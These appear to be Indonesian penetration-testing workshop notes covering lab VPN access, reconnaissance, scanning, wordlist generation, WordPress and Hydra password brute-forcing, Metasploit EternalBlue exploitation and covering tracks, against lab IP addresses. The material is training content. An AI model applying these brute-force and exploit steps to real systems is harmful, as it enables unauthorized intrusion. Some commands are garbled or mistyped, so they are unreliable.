You are on page 1of 3

akses vpn untuk yang online

1. s.id/idn-vpn
2. s.id/B-Pentest ( Include module, Note, etc..)
3. wifi idn : idnmantab
-----------------------------------------------------
1. Mas Tony | IT Security | CCNA,CEHv12, |
2. Mas Farhan | UPN Veteran Jakarta | MTCNA
3. Mas Dhamma | Presales Cloud & Security & Network |

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and
%20Resources/Reverse%20Shell%20Cheatsheet.md
------------------
osintagram
sherlock
-----------------

command theHarvester
theHarvester -d idn.id -b all
command subfinder
subfinder

---------------------

maltego
command
recon-ng

------------------------
bash scripting
command
bash name-file [BLOK-IP] > file.txt
nmap -sn [BLOK-IP] > file.txt
nmap
sudo nmap -iL [FILE.TXT] -sV -p80,443,22,23,139,445

---------------------------------------
Nessus
scaning
---------------------------------------
Scope infra
- arp-scan
- nmap
-sn, -pn,
- nmap
-sV, -p-(65535), -O, -A
- metasploit ( msfconsole )
tools swis army ( enum, scan, exploit )
- gaining access
hydara
wpscan
- exploit
file ( malware, payload, shell )
- lof --
- cover tracks
histroy delete, Donwload, D0nwload.py
- analysis
- reporting

---------------------------------------
windows < 8 -- eternal blue
------------------------------------------

https://www.tenable.com/products/nessus/nessus-essentials
email

------------------------------------------
wpscan --api-token [TOKEN] --url [172.23.0.31] -e
------------------------------------------

git clone https://github.com/danielmiessler/SecLists.git


sudo apt-get install seclist
seclist
----------------------------------------------

crunch [min] [max] [option] >> output.txt


4 5 idn1321

min max --> 8 8


option --> nama orang, tgl, email,
----------------------------------------------
cewl -d 5 -m 5 -w outpu.txt http://172.23.0.32/2023/06/21/tatacara-memasukan-gajah-ke-kulkas
cewl -d 5 -m 5 -w tatacara.txt http://172.23.0.243/2023/06/21/tatacara-memasak-air/
cewl -d 5 -m 5 -w hack-sini.txt http://172.23.0.243/2023/06/21/hack-sini-bang/
cewl -d 5 -m 5 -w /tmp/hack-ini.txt http://172.23.0.243/2023/06/21/hack-sini-aja/
cewl -d 5 -m 5 -w /tmp/blog.txt http://172.23.0.243/2023/06/21/blog-pertama/
---------------------------------------------
admin,hacknotme,hacknomeyeah
---------------------------------------------------------------------------------
wpscan -U hacknomeyeah -P /tmp/tatacara.txt --url http://172.23.0.31/
---------------------------------------------------------------------------------
hydra -U ub23 -P admin2112 --url://172.23.0.33
------------------------------------------------------
target : 172.23.0.30, 172.23.0.31

msfconsole
search eternal blue
use 0
set rhosts [TARGET] --> 192.168.70.14
exploit

You might also like